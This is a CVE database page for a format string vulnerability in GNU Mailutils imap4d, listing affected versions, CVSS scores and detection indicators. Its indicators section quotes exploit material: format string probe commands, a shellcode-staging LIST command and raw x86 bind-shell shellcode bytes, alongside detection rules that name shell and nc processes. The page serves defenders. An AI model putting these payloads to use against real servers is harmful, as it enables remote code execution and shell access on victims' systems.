cbcvebase.
CVE-2005-2878
published 2005-09-13

CVE-2005-2878: Format string vulnerability in search.c in the imap4d server in GNU Mailutils 0.6 allows remote authenticated users to execute arbitrary code via format string…

PriorityP347high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
14.57%
96.2th percentile
Format string vulnerability in search.c in the imap4d server in GNU Mailutils 0.6 allows remote authenticated users to execute arbitrary code via format string specifiers in the SEARCH command.

Affected

6 ranges
VendorProductVersion rangeFixed in
debianmailutils< mailutils 1:0.6.90-3 (bookworm)mailutils 1:0.6.90-3 (bookworm)
gnumailutils
gnumailutils>= 0 < 1:0.6.90-31:0.6.90-3
gnumailutils>= 0 < 1:0.6.90-31:0.6.90-3
gnumailutils>= 0 < 1:0.6.90-31:0.6.90-3
gnumailutils>= 0 < 1:0.6.90-31:0.6.90-3

Detection & IOCsextracted from sources · hover to see the quote

port143
commandSEARCH TOPIC <format_string_payload>
command3 search topic .AAAABBBB%%%d$x
command3 LIST <padding+shellcode>
bytes
\x31\xc0\x50\x40\x89\xc3\x50\x40\x50\x89\xe1\xb0\x66\xcd\x80\x31\xd2\x52\x66\x68\x13\xd2\x43\x66\x53\x89\xe1\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd\x80\x40\x89\x44\x24\x04\x43\x43\xb0\x66\xcd\x80\x83\xc4\x0c\x52\x52\x43\xb0\x66\xcd\x80\x93\x89\xd1\xb0\x3f\xcd\x80\x41\x80\xf9\x03\x75\xf6\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80
bytes
\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80
  • Detect IMAP SEARCH commands containing printf-style format specifiers (e.g., %d$x, %hn, %.Nx) in the search criteria — this is the direct exploitation vector in search.c
  • Monitor IMAP traffic on port 143 for SEARCH TOPIC commands containing sequences matching %[0-9]+\$[xhn] or %.[0-9]+x patterns, indicative of format string exploitation attempts
  • Alert on imap4d processes spawning unexpected child processes (e.g., xterm, /bin/sh, nc) or making outbound connections — post-exploitation indicator for this format string RCE
  • Watch for IMAP LIST commands with oversized payloads (~1024 bytes padded with 0x41) followed by embedded shellcode — used to stage shellcode in imap4d rwx address space before triggering the format string
  • Detect new listening ports 30464 or 5074 opened by imap4d or its child processes — these are the bind-shell ports used by the exploit payloads
  • Brute-force offset discovery pattern: repeated SEARCH TOPIC commands with incrementing numeric format string offsets (e.g., %1$x, %2$x … %N$x) looking for 0x41414141 in the response — indicates active exploitation reconnaissance
  • ·Exploit hardcoded addresses (DTOR_END_ADDR, got_entry, IO_file_close, addr) are OS/build-specific; detections based on these exact values will only match the specific target configurations used in the published PoCs (Fedora Core 6, FreeBSD, Debian etch)
  • ·Exploitation requires prior authentication (remote authenticated users); unauthenticated SEARCH commands cannot trigger this vulnerability

CVSS provenance

nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.